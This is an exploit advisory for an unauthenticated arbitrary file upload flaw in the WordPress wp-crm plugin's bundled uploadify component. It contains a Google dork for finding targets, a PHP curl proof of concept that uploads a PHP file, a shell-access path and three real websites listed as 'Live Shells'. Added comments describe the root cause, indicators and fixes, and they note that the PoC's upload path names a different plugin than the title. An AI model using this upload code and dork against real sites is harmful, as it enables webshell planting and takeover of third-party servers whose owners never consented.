#############################################################################################
#                                                                                           #
#   # Title : WordPress wp-crm Plugin Arbitrary File Upload Vulnerability                   #
#                                                                                           #
#   # Author : X-Bruno                                                                      #
#                                                                                           #
#   # Date : 27/06/2014                                                                     #
#                                                                                           #
#   # Facebook : http://www.facebook.com/Inj3ct.Bruno                                       #
#                                                                                           #
#   # Email: brunox338@gmail.com                                                            #
#                                                                                           #
#   # Vendor : www.wordpress.org                                                            #
#                                                                                           #
#   # Google Dork : inurl:/wp-content/plugins/wp-crm/                                       #
#                                                                                           #
#   # Tested on : Linux
            #                                                                               #
#   #############################################################################################

Exploit : upload shell/.php

<?php
// Published proof-of-concept request, reproduced unchanged for review. It is a
// fragment as published: the curl handle $ch and the target URL are not shown here.
$uploadfile="Bruno.php";
curl_setopt($ch, CURLOPT_POST, true);
// Both the file ('Filedata') and its destination directory ('folder') are supplied by
// the client, and no session cookie, nonce or capability check accompanies the request
// (no CURLOPT_COOKIE / auth option is set). A handler that accepts these values as-is
// would be the root cause; a fixed handler must authenticate the caller, choose the
// destination itself and allow-list non-executable extensions. Note this path names
// wp-property while the title and the "Shell Access" URL below name wp-crm --
// presumably the same bundled uploadify component in both plugins; verify against
// the installed code.
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile", 'folder'=>"/wordpress/wp-content/plugins/wp-property/third-party/uploadify/"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// The handler's raw response is echoed back; it is the only success indicator this PoC gives.
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

-------------------------------

<?php
// Body of the uploaded file: a phpinfo() probe that demonstrates server-side code
// execution and is what the "Live Shells" URLs below would serve. For defenders the
// indicators are any .php file under wp-content/plugins/*/third-party/uploadify/ that
// the plugin did not ship, and POST requests into that directory from unauthenticated
// clients in the access log. Mitigation: remove the bundled uploadify component if it
// is not needed (or replace it with a fixed version) and deny PHP execution in that
// directory at the web server.
phpinfo();
?>

-------------------------------

Shell Access ==== > http://localhost/wordpress/wp-content/plugins/wp-crm/third-party/uploadify/(shell_name.php)

--------------------------------

Examples : (Live Shells)

1- http://www.transport9.com/wp-content/plugins/wp-crm/third-party/uploadify/fuck.php
2- http://adbuzzler.com/wp-content/plugins/wp-crm/third-party/uploadify/fuck.php
3- http://ourladyofthecape.com/wp-content/plugins/wp-crm/third-party/uploadify/fuck.php

#####################################################################
# Greeting : Toomy Jone , Injector Hacker , Dr.SHA6H , HunTerS - Team #
#####################################################################